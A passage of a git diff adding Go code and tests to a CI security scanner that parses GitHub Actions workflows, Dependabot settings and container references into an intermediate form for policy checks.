+		t.Fatalf("expected lexicographic path order, got %q before %q", dfs[0].Path, dfs[1].Path)
+	}
+	if dfs[0].Path != pathA || dfs[1].Path != pathZ {
+		t.Fatalf("expected a before z, got %q then %q", dfs[0].Path, dfs[1].Path)
+	}
+}
+
+// mustWriteFile writes content to path, failing the test
+// immediately on any error.
+func mustWriteFile(t *testing.T, path, content string) {
+	t.Helper()
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/collector/github_workflows.go b/collector/github_workflows.go
new file mode 100644
index 0000000..a48091e
--- /dev/null
+++ b/collector/github_workflows.go
@@ -0,0 +1,825 @@
+package collector
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+ "regexp"
+ "sort"
+ "strings"
+
+ "gopkg.in/yaml.v2"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
+const githubWorkflowsSubdir = ".github/workflows"
+
+// ScanGitHubWorkflows reads every .yml/.yaml file under
+// <rootDir>/.github/workflows/ and aggregates them into a single
+// NormalizedPipeline. Job names are namespaced by the workflow file
+// base name ("ci/lint", "release/build", ...) so two workflows can
+// expose identically-named jobs without clashing in the IR.
+//
+// A missing workflows directory is not an error: the returned
+// pipeline simply carries no jobs. Individual unreadable or
+// unparseable files are returned in partialErrors so the caller can
+// surface them without aborting the whole scan.
+//
+// This is the no-progress variant: it delegates to
+// ScanGitHubWorkflowsWithProgress with a nil callback (which makes
+// every progress report a no-op) so the two entry points share one
+// implementation and cannot drift apart.
+func ScanGitHubWorkflows(projectPath, defaultBranch, rootDir string) (pipeline *ir.NormalizedPipeline, partialErrors []error, err error) {
+	return ScanGitHubWorkflowsWithProgress(projectPath, defaultBranch, rootDir, nil)
+}
+
+// ScanGitHubWorkflowsWithProgress mirrors ScanGitHubWorkflows but
+// notifies the caller through progressFn as it works. The progress
+// total is sized so the bar advances monotonically end-to-end:
+//
+//	step 1         Scanning workflow files
+//	step 2..(1+N)  Resolving action <uses> (N unique refs)
+//	step 2+N       Scan complete
+//
+// The last step (policy evaluation) is reported by the caller
+// (RunGitHubAnalysis) using the same total so the bar keeps
+// climbing. progressFn may be nil; callers that don't care about
+// progress should call the plain ScanGitHubWorkflows variant.
+func ScanGitHubWorkflowsWithProgress(projectPath, defaultBranch, rootDir string, progressFn ProgressFunc) (pipeline *ir.NormalizedPipeline, partialErrors []error, err error) {
+	pipeline = &ir.NormalizedPipeline{
+		Provider:      ir.ProviderGitHub,
+		ProjectPath:   projectPath,
+		DefaultBranch: defaultBranch,
+	}
+	dir := filepath.Join(rootDir, githubWorkflowsSubdir)
+	entries, err := os.ReadDir(dir)
+	if err != nil {
+		if os.IsNotExist(err) {
+			// No workflows directory: an empty pipeline, not an error.
+			return pipeline, nil, nil
+		}
+		return nil, nil, fmt.Errorf("read %s: %w", dir, err)
+	}
+	for _, entry := range entries {
+		if entry.IsDir() {
+			continue
+		}
+		name := entry.Name()
+		if !strings.HasSuffix(name, ".yml") && !strings.HasSuffix(name, ".yaml") {
+			continue
+		}
+		path := filepath.Join(dir, name)
+		data, readErr := os.ReadFile(path)
+		if readErr != nil {
+			partialErrors = append(partialErrors, fmt.Errorf("%s: %w", name, readErr))
+			continue
+		}
+		jobs, parseErr := parseGitHubWorkflowJobs(data, workflowBaseName(name), path)
+		if parseErr != nil {
+			partialErrors = append(partialErrors, fmt.Errorf("%s: %w", name, parseErr))
+			continue
+		}
+		pipeline.Jobs = append(pipeline.Jobs, jobs...)
+	}
+	// Stable job order regardless of directory-listing order.
+	sort.Slice(pipeline.Jobs, func(i, j int) bool {
+		return pipeline.Jobs[i].Name < pipeline.Jobs[j].Name
+	})
+	if dcfg, derr := scanDependabotConfig(rootDir); derr != nil {
+		partialErrors = append(partialErrors, derr)
+	} else if dcfg != nil {
+		pipeline.Dependabot = dcfg
+	}
+	pipeline.RenovateConfigPath = scanRenovateConfig(rootDir)
+	pipeline.SecurityPolicyPath = scanSecurityPolicy(rootDir)
+	pipeline.Dockerfiles = scanDockerfiles(rootDir)
+	// Reserve 3 leading/trailing steps around the per-action phase:
+	// "Scanning" at step 1, "Evaluating policies" at step (total-1)
+	// emitted by the caller (RunGitHubAnalysis), and a final "Scan
+	// complete" at total.
+	n := countUniqueActionRefs(pipeline)
+	total := n + 3
+	report(progressFn, 1, total, "Scanning workflow files")
+	enrichActionsWithAPIMetadata(pipeline, wrapProgress(progressFn, total))
+	return pipeline, partialErrors, nil
+}
+
+// countUniqueActionRefs returns the number of distinct
+// `owner/repo@ref` step-level references the pipeline carries.
+// Used to size the progress bar; duplicates count once because the
+// metadata client caches every lookup.
+func countUniqueActionRefs(pipeline *ir.NormalizedPipeline) int {
+	unique := map[string]struct{}{}
+	for j := range pipeline.Jobs {
+		for _, action := range pipeline.Jobs[j].Uses {
+			unique[action.Uses] = struct{}{}
+		}
+	}
+	return len(unique)
+}
+
+// wrapProgress adapts the per-enrichment-step callback (done, N,
+// message) into the global progress scale so the bar keeps
+// climbing. The enrichment owns slots 2..(1+N); its inner `done`
+// counter is offset by +1 and its total is overridden to the
+// pipeline-wide grand total. A nil fn stays nil so callees can keep
+// doing a simple nil check.
+func wrapProgress(fn ProgressFunc, grandTotal int) ProgressFunc {
+	if fn == nil {
+		return nil
+	}
+	return func(done, _ int, message string) {
+		fn(done+1, grandTotal, message)
+	}
+}
+
+// TotalProgressStepsForPipeline returns the grand total the caller
+// (RunGitHubAnalysis) should use when emitting its own progress
+// update for the policy-evaluation phase, so it keeps the bar in
+// sync with what the collector reported. The +3 mirrors the three
+// reserved leading/trailing steps in ScanGitHubWorkflowsWithProgress;
+// a nil pipeline still gets those fixed steps.
+func TotalProgressStepsForPipeline(pipeline *ir.NormalizedPipeline) int {
+	if pipeline == nil {
+		return 3
+	}
+	return countUniqueActionRefs(pipeline) + 3
+}
+
+// ProgressFunc is the signature callers use to observe the progress
+// of long-running collector operations -- currently the GitHub API
+// enrichment phase. step counts up toward total; message is a short
+// human-readable label for the current step.
+type ProgressFunc func(step, total int, message string)
+
+// report invokes fn when non-nil; a nil ProgressFunc means the
+// caller opted out of progress reporting.
+func report(fn ProgressFunc, step, total int, message string) {
+	if fn != nil {
+		fn(step, total, message)
+	}
+}
+
+// enrichActionsWithAPIMetadata walks every job's steps[].uses and
+// populates Action.Metadata from the GitHub REST API. Uses a shared
+// client so duplicate `owner/repo@ref` references across workflows
+// cost a single lookup. Also resolves the tag named in a trailing
+// `# vX.Y.Z` comment so ref-version-mismatch can compare claim vs
+// reality.
+//
+// When progressFn is non-nil, emits a "Resolving action <uses>"
+// step for every unique reference so the caller's spinner can track
+// the long phase. Duplicate refs only emit once because the client
+// caches and the enrichment loop iterates actions left to right.
+func enrichActionsWithAPIMetadata(pipeline *ir.NormalizedPipeline, progressFn ProgressFunc) {
+	client := NewGitHubMetadataClient()
+	if !client.Available() {
+		// Degraded mode (client unavailable): leave every action's
+		// Metadata untouched rather than half-populating it.
+		return
+	}
+	// Pre-count unique refs for accurate N/total ratios.
+	uniqueRefs := map[string]struct{}{}
+	for i := range pipeline.Jobs {
+		for k := range pipeline.Jobs[i].Uses {
+			uniqueRefs[pipeline.Jobs[i].Uses[k].Uses] = struct{}{}
+		}
+	}
+	total := len(uniqueRefs)
+	seen := map[string]struct{}{}
+	done := 0
+	for i := range pipeline.Jobs {
+		job := &pipeline.Jobs[i]
+		for k := range job.Uses {
+			action := &job.Uses[k]
+			if _, already := seen[action.Uses]; !already {
+				done++
+				seen[action.Uses] = struct{}{}
+				report(progressFn, done, total, fmt.Sprintf("Resolving action %s", action.Uses))
+			}
+			meta := client.Resolve(action.Uses)
+			if isZeroMetadata(meta) && action.Comment == "" {
+				// No API data and no version comment to cross-check:
+				// nothing worth attaching.
+				continue
+			}
+			amd := &ir.ActionMetadata{
+				RepoArchived:     meta.RepoArchived,
+				RefExists:        meta.RefExists,
+				RefKind:          meta.RefKind,
+				TagSha:           meta.TagSha,
+				LatestTag:        meta.LatestTag,
+				LatestReleaseSha: meta.LatestReleaseSha,
+				RefIsAmbiguous:   meta.RefIsAmbiguous,
+				Advisories:       meta.Advisories,
+			}
+			if action.Comment != "" {
+				amd.CommentVersion = extractVersionFromComment(action.Comment)
+				if amd.CommentVersion != "" {
+					if ownerRepo := ownerRepoFromUses(action.Uses); ownerRepo != "" {
+						amd.CommentTagSha = client.ResolveTagSha(ownerRepo, amd.CommentVersion)
+					}
+				}
+			}
+			action.Metadata = amd
+		}
+	}
+}
+
+// ownerRepoFromUses extracts "owner/repo" from a uses: value,
+// dropping any sub-path (composite-action reference) and the @ref
+// tail. Returns "" when the value has no @ref or no repo segment.
+func ownerRepoFromUses(uses string) string {
+	at := strings.Index(uses, "@")
+	if at < 0 {
+		return ""
+	}
+	segments := strings.SplitN(uses[:at], "/", 3)
+	if len(segments) < 2 {
+		return ""
+	}
+	return segments[0] + "/" + segments[1]
+}
+
+// commentVersionRegex matches the version token in a trailing
+// `# vX.Y.Z` comment. Accepts `v4.1.0`, `4.1.0`, `v4` -- returns the
+// first match including any `v` prefix, which is the canonical tag
+// form most actions use.
+var commentVersionRegex = regexp.MustCompile(`(?i)\bv?\d+(?:\.\d+)*(?:-[A-Za-z0-9.-]+)?\b`)
+
+// extractVersionFromComment returns the first version-looking token
+// in comment, or "" when none is present.
+func extractVersionFromComment(comment string) string {
+	return commentVersionRegex.FindString(comment)
+}
+
+// ghDependabotConfig mirrors the subset of .github/dependabot.yml
+// the dependabot-* policies care about.
+// `updates[].insecure-external-code-execution` is the critical
+// toggle: "allow" lets Dependabot run install / postinstall hooks
+// during version resolution. `cooldown:` is captured only to its
+// presence (hence `any`) -- the exact thresholds are
+// policy-irrelevant for the missing-cooldown check.
+type ghDependabotConfig struct {
+	Updates []struct {
+		PackageEcosystem     string `yaml:"package-ecosystem"`
+		InsecureExternalExec string `yaml:"insecure-external-code-execution"`
+		Cooldown             any    `yaml:"cooldown"`
+	} `yaml:"updates"`
+}
+
+// scanDependabotConfig reads .github/dependabot.yml (or .yaml) if it
+// exists and surfaces the list of ecosystems that re-enable insecure
+// external code execution plus those with no cooldown configured.
+// The first existing file wins (.yml takes precedence over .yaml).
+// Missing file is not an error: the return is (nil, nil) and the
+// pipeline simply carries no dependabot data.
+func scanDependabotConfig(rootDir string) (*ir.DependabotConfig, error) {
+	for _, name := range []string{"dependabot.yml", "dependabot.yaml"} {
+		path := filepath.Join(rootDir, ".github", name)
+		data, err := os.ReadFile(path)
+		if err != nil {
+			if os.IsNotExist(err) {
+				continue
+			}
+			return nil, fmt.Errorf("read %s: %w", path, err)
+		}
+		var cfg ghDependabotConfig
+		if err := yaml.Unmarshal(data, &cfg); err != nil {
+			return nil, fmt.Errorf("parse %s: %w", path, err)
+		}
+		var insecure []string
+		var missingCooldown []string
+		for _, u := range cfg.Updates {
+			if u.InsecureExternalExec == "allow" {
+				insecure = append(insecure, u.PackageEcosystem)
+			}
+			if u.Cooldown == nil {
+				missingCooldown = append(missingCooldown, u.PackageEcosystem)
+			}
+		}
+		return &ir.DependabotConfig{
+			Path:                      path,
+			InsecureExecEcosystems:    insecure,
+			MissingCooldownEcosystems: missingCooldown,
+		}, nil
+	}
+	return nil, nil
+}
+
// ghWorkflowHeader mirrors the top-level shape of a GitHub Actions
// workflow file. Using a typed struct with explicit yaml tags avoids the
// YAML 1.1 trap where `on:` would otherwise be parsed as the boolean
// true and silently dropped from a map[string]any root.
type ghWorkflowHeader struct {
	// Name is the workflow's display name.
	Name string `yaml:"name"`
	// On may be a string, a list, or a map of event names to filters.
	On any `yaml:"on"`
	// Permissions may be a string shortcut or a scope->level map.
	Permissions any `yaml:"permissions"`
	// Concurrency is captured only for presence (nil vs non-nil).
	Concurrency any `yaml:"concurrency"`
	Jobs        map[string]any `yaml:"jobs"`
}
+
// parseGitHubWorkflowJobs extracts jobs..container, workflow-level
// permissions, and workflow triggers from a single workflow file. Jobs
// are emitted with a namespaced name (e.g. "ci/lint") and OriginFile
// set to the absolute workflow path. Workflow-level `permissions:` are
// propagated to every job that does not override them; `on:` triggers
// are propagated uniformly so trigger-focused policies can see them at
// the job level.
//
// Returns (nil, nil) for a YAML document without a `jobs:` map — such
// files are simply not workflows.
func parseGitHubWorkflowJobs(data []byte, namespace, originFile string) ([]ir.Job, error) {
	var wf ghWorkflowHeader
	if err := yaml.Unmarshal(data, &wf); err != nil {
		return nil, fmt.Errorf("yaml: %w", err)
	}
	if len(wf.Jobs) == 0 {
		return nil, nil
	}

	workflowPerms := normalizeGitHubPermissions(wf.Permissions)
	triggers := extractGitHubTriggers(wf.On)
	// Raw-byte scans recover positional data (line numbers) and
	// trailing comments that yaml.v2 discards during unmarshalling.
	jobLines := scanGitHubJobLines(data)
	usesLines := scanGitHubUsesLines(data)
	usesComments := scanGitHubUsesComments(data)
	workflowHasConcurrency := wf.Concurrency != nil

	jobs := make([]ir.Job, 0, len(wf.Jobs))
	for jobName, v := range wf.Jobs {
		section, ok := ghCastStringMap(v)
		if !ok {
			// Non-map job bodies (malformed YAML) are skipped.
			continue
		}
		job := ir.Job{
			Name:                   namespace + "/" + jobName,
			OriginFile:             originFile,
			OriginLine:             jobLines[jobName],
			Triggers:               triggers,
			WorkflowName:           wf.Name,
			WorkflowHasConcurrency: workflowHasConcurrency,
		}
		if _, hasJobConcurrency := section["concurrency"]; hasJobConcurrency {
			job.JobHasConcurrency = true
		}
		if img, ok := parseGitHubContainer(section["container"]); ok {
			job.Image = &img
		}
		// Job-level permissions win outright; a job that declares the
		// key (even empty) does not inherit the workflow-level block.
		if jobPerms, present := section["permissions"]; present {
			job.Permissions = normalizeGitHubPermissions(jobPerms)
		} else if workflowPerms != nil {
			job.Permissions = workflowPerms
		}
		if scripts := extractGitHubRunScripts(section["steps"]); len(scripts) > 0 {
			job.Scripts = scripts
		}
		// Aggregate job-level `env:` with every step-level `env:` into
		// a single Variables map. The semantics differ at runtime
		// (step-level envs only apply to their own step), but the
		// rego policies pattern-match over template expressions in
		// value strings — not over runtime scope — so folding them
		// together gives a complete surface to scan. Later entries
		// overwrite earlier ones on collisions; that is acceptable
		// because the patterns we look for are present or absent
		// regardless of which binding wins the collision.
		envVars := normalizeGitHubEnv(section["env"])
		for k, v := range extractGitHubStepEnvs(section["steps"]) {
			if envVars == nil {
				envVars = map[string]string{}
			}
			envVars[k] = v
		}
		if envVars != nil {
			job.Variables = envVars
		}
		if uses := extractGitHubUses(section["steps"]); len(uses) > 0 {
			// Pair each parsed action with its raw-scan artifacts:
			// the trailing comment is keyed by the `uses` ref, while
			// line numbers are matched by positional index within
			// the job (the scans emit them in file order).
			jobUsesLines := usesLines[jobName]
			for k := range uses {
				if c, ok := usesComments[uses[k].Uses]; ok {
					uses[k].Comment = c
				}
				if k < len(jobUsesLines) {
					uses[k].Line = jobUsesLines[k]
				}
			}
			job.Uses = uses
		}
		// A job-level `uses:` means this job calls a reusable
		// workflow; `secrets: inherit` forwards the whole secret set.
		if jobUses, ok := section["uses"].(string); ok && jobUses != "" {
			job.ReusableWorkflowUses = jobUses
			if secretsVal, ok := section["secrets"].(string); ok && secretsVal == "inherit" {
				job.SecretsInherit = true
			}
		}
		if conds := collectGitHubJobConditions(section); len(conds) > 0 {
			job.Conditions = conds
		}
		if env := extractGitHubJobEnvironment(section["environment"]); env != "" {
			job.Environment = env
		}
		jobs = append(jobs, job)
	}
	return jobs, nil
}
+
// extractGitHubJobEnvironment normalises the two accepted forms of
// `environment:`:
//
//	environment: production              # shorthand string
//	environment: { name: production }    # long form
//
// Only the environment name is returned — the long form's `url`
// sub-field does not gate deployment approvals and is ignored. Any
// other shape yields "".
func extractGitHubJobEnvironment(v any) string {
	if shorthand, ok := v.(string); ok {
		return shorthand
	}
	if section, ok := v.(map[any]any); ok {
		if name, ok := section["name"].(string); ok {
			return name
		}
	}
	return ""
}
+
// collectGitHubJobConditions gathers every `if:` expression attached to
// a job or one of its steps, in document order. The raw string is
// preserved (template expressions, booleans, whatever) so Rego policies
// can pattern-match without a dedicated parser. Non-string values are
// stringified so a bare `if: true` surfaces as "true" rather than being
// dropped; empty strings and nils are skipped.
func collectGitHubJobConditions(section map[string]any) []string {
	var conds []string
	record := func(v any) {
		var s string
		switch x := v.(type) {
		case nil:
			return
		case string:
			s = x
		default:
			s = fmt.Sprint(x)
		}
		if s != "" {
			conds = append(conds, s)
		}
	}
	if expr, ok := section["if"]; ok {
		record(expr)
	}
	stepList, ok := section["steps"].([]any)
	if !ok {
		return conds
	}
	for _, raw := range stepList {
		step, isMap := raw.(map[any]any)
		if !isMap {
			continue
		}
		if expr, ok := step["if"]; ok {
			record(expr)
		}
	}
	return conds
}
+
// ghStringify renders an arbitrary YAML scalar as a string: strings
// pass through, nil becomes "", and everything else goes through
// fmt.Sprint.
func ghStringify(v any) string {
	if v == nil {
		return ""
	}
	if s, ok := v.(string); ok {
		return s
	}
	return fmt.Sprint(v)
}
+
// ghUsesCommentRe matches a `uses:` line carrying a trailing
// `# comment`, with any indentation, an optional leading `-` list
// marker, and optional quotes around the ref. Capture 1 is the ref,
// capture 2 the comment text. Compiled once at package scope so
// repeated workflow scans do not pay the compilation cost per call.
var ghUsesCommentRe = regexp.MustCompile(`^\s*-?\s*uses:\s*["']?([^"'\s#]+)["']?\s*#\s*(.+?)\s*$`)

// scanGitHubUsesComments walks the raw workflow bytes and returns a
// map of `uses` value -> trailing `# comment`. yaml.v2 discards
// comments during parse, so we recover them here. Used by
// ref-version-mismatch (ISSUE-110): a `uses: owner/repo@<sha> # v4.1.0`
// comment tells the reviewer which version the SHA is supposed to be;
// the policy verifies the claim against the actual tag metadata.
func scanGitHubUsesComments(data []byte) map[string]string {
	out := map[string]string{}
	for _, line := range strings.Split(string(data), "\n") {
		m := ghUsesCommentRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		// Last wins on duplicates — identical `uses` refs in the
		// same file are expected to carry the same comment.
		out[m[1]] = m[2]
	}
	return out
}
+
var (
	// ghUsesJobHeaderRe matches the canonical 2-space-indented job
	// header line inside the `jobs:` block (optionally followed by a
	// trailing comment).
	ghUsesJobHeaderRe = regexp.MustCompile(`^  ([A-Za-z_][A-Za-z0-9_-]*)\s*:\s*(#.*)?$`)
	// ghUsesStepRe matches any `uses:` directive with an optional `-`
	// list marker and optional quoting.
	ghUsesStepRe = regexp.MustCompile(`^\s*-?\s*uses:\s*["']?[^"'\s#]+`)
)

// scanGitHubUsesLines walks the raw workflow bytes and returns, for
// each job name, the 1-based line numbers of every `uses:` directive
// inside that job, in file order. The yaml.v2 unmarshaller flattens
// steps into plain maps without preserving positions, so the
// collector re-scans the bytes and pairs each `[]ir.Action` entry
// with the matching line by positional index. Fires for
// ISSUE-104/110/111/114 where the reviewer needs the exact step, not
// the enclosing job header. The regexes are package-level so each
// call only pays for the scan itself.
func scanGitHubUsesLines(data []byte) map[string][]int {
	out := map[string][]int{}
	lines := strings.Split(string(data), "\n")
	inJobs := false
	currentJob := ""
	for i, line := range lines {
		trimmed := strings.TrimRight(line, " \t\r")
		if trimmed == "jobs:" {
			inJobs = true
			continue
		}
		if !inJobs {
			continue
		}
		// A non-indented non-empty line closes the jobs block.
		if len(trimmed) > 0 && !strings.HasPrefix(trimmed, " ") && !strings.HasPrefix(trimmed, "\t") {
			break
		}
		if m := ghUsesJobHeaderRe.FindStringSubmatch(line); m != nil {
			currentJob = m[1]
			continue
		}
		if currentJob != "" && ghUsesStepRe.MatchString(line) {
			out[currentJob] = append(out[currentJob], i+1)
		}
	}
	return out
}
+
// ghJobHeaderLineRe matches the canonical `  job-name:` header form
// (exactly two spaces of indent, optional trailing comment) inside the
// `jobs:` block. Package-level so the pattern is compiled once.
var ghJobHeaderLineRe = regexp.MustCompile(`^  ([A-Za-z_][A-Za-z0-9_-]*)\s*:\s*(#.*)?$`)

// scanGitHubJobLines returns a map from job name to its 1-based line
// number in the workflow source. Used to attach a file:line hint to
// findings so editors can jump straight to the offending job. The
// scan is deliberately simple: walk the raw bytes, find the first
// line after `jobs:` that starts with two spaces followed by
// `name:`. YAML nesting beyond the canonical 2-space job header
// form is not modeled — if the file uses tabs or deeper indentation
// the line simply stays at 0 and the renderer omits the :line suffix.
func scanGitHubJobLines(data []byte) map[string]int {
	out := map[string]int{}
	lines := strings.Split(string(data), "\n")
	inJobs := false
	for i, line := range lines {
		trimmed := strings.TrimRight(line, " \t\r")
		if trimmed == "jobs:" {
			inJobs = true
			continue
		}
		if !inJobs {
			continue
		}
		// A non-indented non-empty line closes the jobs block.
		if len(trimmed) > 0 && !strings.HasPrefix(trimmed, " ") && !strings.HasPrefix(trimmed, "\t") {
			break
		}
		if m := ghJobHeaderLineRe.FindStringSubmatch(line); m != nil {
			// First occurrence wins for duplicate job names.
			if _, seen := out[m[1]]; !seen {
				out[m[1]] = i + 1
			}
		}
	}
	return out
}
+
+// extractGitHubUses walks `jobs..steps[]` and collects every step
+// that invokes a reusable action via `uses:`, together with the raw
+// `with:` block. Inline `run:` steps are ignored (they land in
+// Scripts via extractGitHubRunScripts). The `with:` map values are
+// kept as-is so policies can distinguish strings, booleans and
+// numbers (e.g. `persist-credentials: false` β the YAML boolean,
+// not the string "false").
+func extractGitHubUses(v any) []ir.Action {
+ stepsList, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ out := make([]ir.Action, 0, len(stepsList))
+ for _, s := range stepsList {
+ stepMap, ok := ghCastStringMap(s)
+ if !ok {
+ continue
+ }
+ uses, ok := stepMap["uses"].(string)
+ if !ok || uses == "" {
+ continue
+ }
+ action := ir.Action{Uses: uses}
+ if withMap, ok := ghCastStringMap(stepMap["with"]); ok {
+ action.With = withMap
+ }
+ out = append(out, action)
+ }
+ return out
+}
+
// extractGitHubStepEnvs walks steps[].env and returns a flat map of
// every name -> value pair it finds, with later steps overwriting
// earlier ones on collisions. All scalar values are stringified.
// Returns nil when the input is not a step list or carries no envs —
// the same shape as normalizeGitHubEnv so the caller can merge the two.
func extractGitHubStepEnvs(v any) map[string]string {
	steps, ok := v.([]any)
	if !ok {
		return nil
	}
	var out map[string]string
	for _, raw := range steps {
		step, isMap := raw.(map[any]any)
		if !isMap {
			continue
		}
		env, hasEnv := step["env"].(map[any]any)
		if !hasEnv {
			continue
		}
		for key, val := range env {
			name, isStr := key.(string)
			if !isStr {
				continue
			}
			if out == nil {
				out = map[string]string{}
			}
			out[name] = fmt.Sprintf("%v", val)
		}
	}
	return out
}
+
// normalizeGitHubEnv converts a workflow/job `env:` block into the
// map[string]string shape the IR carries. YAML scalar values (strings,
// booleans, numbers) are all stringified so policies can compare
// uniformly against literal strings like "true". Non-map input,
// non-string keys and empty results all collapse to nil.
func normalizeGitHubEnv(v any) map[string]string {
	raw, ok := v.(map[any]any)
	if !ok {
		return nil
	}
	var out map[string]string
	for key, val := range raw {
		name, isStr := key.(string)
		if !isStr {
			continue
		}
		if out == nil {
			out = make(map[string]string, len(raw))
		}
		out[name] = fmt.Sprintf("%v", val)
	}
	return out
}
+
// extractGitHubRunScripts walks `jobs..steps[]` and collects every
// inline shell script declared via `run:`. Steps using `uses:` (actions)
// are ignored — their behavior lives in the referenced action, not in
// the workflow file. Empty `run:` blocks are dropped. Returns nil when
// the input is not a step list.
func extractGitHubRunScripts(v any) []string {
	steps, ok := v.([]any)
	if !ok {
		return nil
	}
	scripts := make([]string, 0, len(steps))
	for _, raw := range steps {
		step, isMap := raw.(map[any]any)
		if !isMap {
			continue
		}
		run, _ := step["run"].(string)
		if run == "" {
			continue
		}
		scripts = append(scripts, run)
	}
	return scripts
}
+
// extractGitHubTriggers returns the sorted list of event names declared
// under `on:`. The YAML value can be a string ("push"), a list
// (["push", "pull_request"]) or a map keyed by event name with optional
// filters — only the event names are preserved; their configuration is
// dropped for now. Anything else yields nil.
func extractGitHubTriggers(v any) []string {
	switch src := v.(type) {
	case string:
		return []string{src}
	case []any:
		events := make([]string, 0, len(src))
		for _, item := range src {
			if name, isStr := item.(string); isStr {
				events = append(events, name)
			}
		}
		sort.Strings(events)
		return events
	case map[any]any:
		events := make([]string, 0, len(src))
		for key := range src {
			if name, isStr := key.(string); isStr {
				events = append(events, name)
			}
		}
		sort.Strings(events)
		return events
	default:
		return nil
	}
}
+
// normalizeGitHubPermissions converts YAML's untyped map[any]any into a
// JSON-friendly shape so it survives the round-trip into Rego's input.
// String shortcuts ("write-all", "read-all") are returned as-is; maps
// become map[string]string (non-string keys/values are dropped); any
// other shape yields nil.
func normalizeGitHubPermissions(v any) any {
	if v == nil {
		return nil
	}
	if shortcut, ok := v.(string); ok {
		return shortcut
	}
	raw, ok := v.(map[any]any)
	if !ok {
		return nil
	}
	out := make(map[string]string, len(raw))
	for key, val := range raw {
		scope, scopeOK := key.(string)
		level, levelOK := val.(string)
		if scopeOK && levelOK {
			out[scope] = level
		}
	}
	return out
}
+
+// parseGitHubContainer accepts both the `container: "name:tag"` shortcut
+// and the `container: { image: "name:tag", ... }` long form. When the
+// long form carries a `credentials.password`, the raw value (including
+// `${{ secrets.X }}` templates, which stay as strings) is forwarded on
+// the IR so policies can distinguish a hard-coded literal from a
+// secret reference.
+func parseGitHubContainer(v any) (ir.Image, bool) {
+ switch c := v.(type) {
+ case string:
+ return splitImageRef(c), true
+ case map[any]any:
+ m, _ := ghCastStringMap(c)
+ img, ok := m["image"].(string)
+ if !ok {
+ return ir.Image{}, false
+ }
+ out := splitImageRef(img)
+ if creds, ok := ghCastStringMap(m["credentials"]); ok {
+ if pw, ok := creds["password"].(string); ok {
+ out.CredentialsPassword = pw
+ }
+ }
+ return out, true
+ }
+ return ir.Image{}, false
+}
+
+func splitImageRef(ref string) ir.Image {
+ // Digest form takes precedence: "alpine@sha256:..."
+ if at := strings.Index(ref, "@"); at > 0 {
+ return ir.Image{Name: ref[:at], Digest: ref[at+1:]}
+ }
+ if colon := strings.LastIndex(ref, ":"); colon > 0 {
+ return ir.Image{Name: ref[:colon], Tag: ref[colon+1:]}
+ }
+ return ir.Image{Name: ref}
+}
+
// ghCastStringMap converts a yaml.v2 map[any]any into a map keyed by
// string, dropping entries whose key is not a string. The second
// return is false when v is not a map at all.
func ghCastStringMap(v any) (map[string]any, bool) {
	src, ok := v.(map[any]any)
	if !ok {
		return nil, false
	}
	out := make(map[string]any, len(src))
	for key, val := range src {
		if name, isStr := key.(string); isStr {
			out[name] = val
		}
	}
	return out, true
}
+
// workflowBaseName strips the last extension from a workflow file name
// ("ci.yml" -> "ci"). A leading dot (dotfile) or no dot at all leaves
// the name untouched.
func workflowBaseName(fileName string) string {
	dot := strings.LastIndex(fileName, ".")
	if dot <= 0 {
		return fileName
	}
	return fileName[:dot]
}
diff --git a/collector/github_workflows_test.go b/collector/github_workflows_test.go
new file mode 100644
index 0000000..51cf411
--- /dev/null
+++ b/collector/github_workflows_test.go
@@ -0,0 +1,292 @@
+package collector
+
+import (
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
// TestScanGitHubWorkflows_Missing verifies that a repository without a
// .github/workflows directory yields an empty GitHub pipeline and no
// partial errors — absence of workflows is not an error condition.
func TestScanGitHubWorkflows_Missing(t *testing.T) {
	tmp := t.TempDir()

	pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}
	if len(partial) != 0 {
		t.Fatalf("expected no partial errors, got %v", partial)
	}
	if pipeline.Provider != ir.ProviderGitHub {
		t.Errorf("expected provider github, got %q", pipeline.Provider)
	}
	if len(pipeline.Jobs) != 0 {
		t.Errorf("expected no jobs, got %d", len(pipeline.Jobs))
	}
}
+
// TestScanGitHubWorkflows_FindsAndNamespacesJobs verifies that jobs
// from multiple workflow files are collected, namespaced by workflow
// base name (so identical job names in different files do not
// collide), that both container forms parse, and that non-workflow
// files in the directory are ignored.
func TestScanGitHubWorkflows_FindsAndNamespacesJobs(t *testing.T) {
	tmp := t.TempDir()
	wfDir := filepath.Join(tmp, ".github", "workflows")
	if err := os.MkdirAll(wfDir, 0o755); err != nil {
		t.Fatal(err)
	}

	ci := `name: CI
on: push
jobs:
  lint:
    runs-on: ubuntu-latest
    container: alpine:latest
  test:
    runs-on: ubuntu-latest
    container:
      image: node:20-alpha
`
	release := `name: Release
on:
  push:
    tags: [v*]
jobs:
  lint: # same name as CI's job, must not collide
    runs-on: ubuntu-latest
    container:
      image: debian:bookworm
`
	notWorkflow := `this is not yaml workflow`

	for name, content := range map[string]string{
		"ci.yml":            ci,
		"release.yaml":      release,
		"not-a-workflow.md": notWorkflow,
	} {
		if err := os.WriteFile(filepath.Join(wfDir, name), []byte(content), 0o644); err != nil {
			t.Fatal(err)
		}
	}

	pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}
	if len(partial) != 0 {
		t.Fatalf("unexpected partial errors: %v", partial)
	}

	// Index jobs by namespaced name -> image tag for easy comparison.
	got := map[string]string{}
	for _, j := range pipeline.Jobs {
		tag := ""
		if j.Image != nil {
			tag = j.Image.Tag
		}
		got[j.Name] = tag
	}

	expected := map[string]string{
		"ci/lint":      "latest",
		"ci/test":      "20-alpha",
		"release/lint": "bookworm",
	}
	if len(got) != len(expected) {
		t.Fatalf("expected %d jobs, got %d: %v", len(expected), len(got), got)
	}
	for name, tag := range expected {
		if got[name] != tag {
			t.Errorf("job %q: expected tag %q, got %q", name, tag, got[name])
		}
	}
}
+
// TestScanGitHubWorkflows_TriggersPropagation verifies that all three
// accepted `on:` shapes (string, list, map) survive parsing and are
// propagated to every job, with list/map forms emitted sorted.
func TestScanGitHubWorkflows_TriggersPropagation(t *testing.T) {
	tmp := t.TempDir()
